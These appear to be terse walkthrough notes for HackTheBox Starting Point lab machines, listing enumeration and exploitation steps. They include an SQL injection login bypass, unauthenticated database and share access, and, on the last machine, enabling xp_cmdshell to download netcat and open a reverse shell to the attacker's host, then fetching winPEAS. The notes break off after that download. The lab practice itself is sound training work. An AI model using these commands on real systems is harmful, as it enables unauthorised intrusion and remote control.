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HackTheBox : Starting Point


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> telnet : 23/tcp
  2. Exploitation:
    1. telnet: $ telnet <IP> --> User : root
  3. Flag:
    1. $ cat flag.txt


  1. Enumeration: 1.Nmap: $ nmap -v -A -T4 <IP> --> ftp-anon : 21/tcp
  2. Exploitation:
    1. ftp: $ ftp <IP> --> user : Anonymous / password :
  3. Flag:
    1. ftp> get flag.txt --> download file


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> smb : 445/tcp
  2. Exploitation:
    1. smbclient: $ smbclient -L <IP> --> list the available shares
    2. smbclient: $ smbclient -N \\\\<IP>\\<share> --> connect to share -N = no auth
  3. Flag:
    1. smb: \> get flag.txt --> download file


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> Apache/2.4.38 (Debian) : 80/tcp
  2. Exploitation:
    1. SQLi: username = admin & password = ' OR 1=1 #
  3. Flag:
    1. Displayed onscreen.


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> mysql : 3306/tcp
  2. Exploitation:
    1. mysql: $ mysql -h <IP> -u root
    2. mysql: MariaDB [(none)]> SHOW databases;
    3. mysql: MariaDB [(none)]> USE htb;
    4. mysql: MariaDB [(htb)]> SHOW tables;
    5. mysql: MariaDB [(htb)]> SELECT * FROM config;
  3. Flag:
    1. Read from table.


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> ftp-anon : 21/tcp && Apache/2.4.41 (Ubuntu) : 80/tcp
  2. Exploitation:
    1. ftp: $ ftp <IP> --> user : Anonymous / password :
    2. ftp: ftp> dir --> list all files available
    3. ftp: ftp> get allowed.userlist --> download file
    4. ftp: ftp> get allowed.userlist.passwd --> download file
    5. dirsearch: $ dirsearch -u http://<IP>/ --> found /login.php page
    6. Use creds found in both files
  3. Flag:
    1. Displayed onscreen.


  1. Enumeration:
    1. Nmap: $ nmap -v -A -T4 <IP> --> smb : 445/tcp && mssql : 1433/tcp
  2. Exploitation:
    1. smbclient: $ smbclient -L <IP> --> list the available shares
    2. smbclient: $ smbclient -N \\\\<IP>\\<share> --> connect to share -N = no auth
    3. smbclient: smb: \> get prod.dtsConfig --> credentials found in file
    4. impacket-mssqlclient: $ impacket-mssqlclient ARCHETYPE/sql_svc:<password>@<IP> -windows-auth --> connect to mssql
    5. MSSQL: SQL> enable_xp_cmdshell; --> enable xp_cmdshell to run commands
    7. MSSQL: SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget <link to netcat executable> -outfile nc64.exe --> download netcat in folder where we have enough privileges (downloads)
    8. netcat: nc -nvlp 4444 --> netcat listening on our machine
    9. MSSQL: SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <MyIP> 4444 --> target machine is connecting to our listening netcat, and will run through cmd.exe everythin our netcat sends, to send it back to us
    10. netcat->cmd: C:\Users\sql_svc\Downloads>powershell --> listening netcat is now a powershell shell
    11. netcat->powershell: PS> wget <link to winpeas executable> -outfile winPEASx64.exe --> download winPEAS on target machine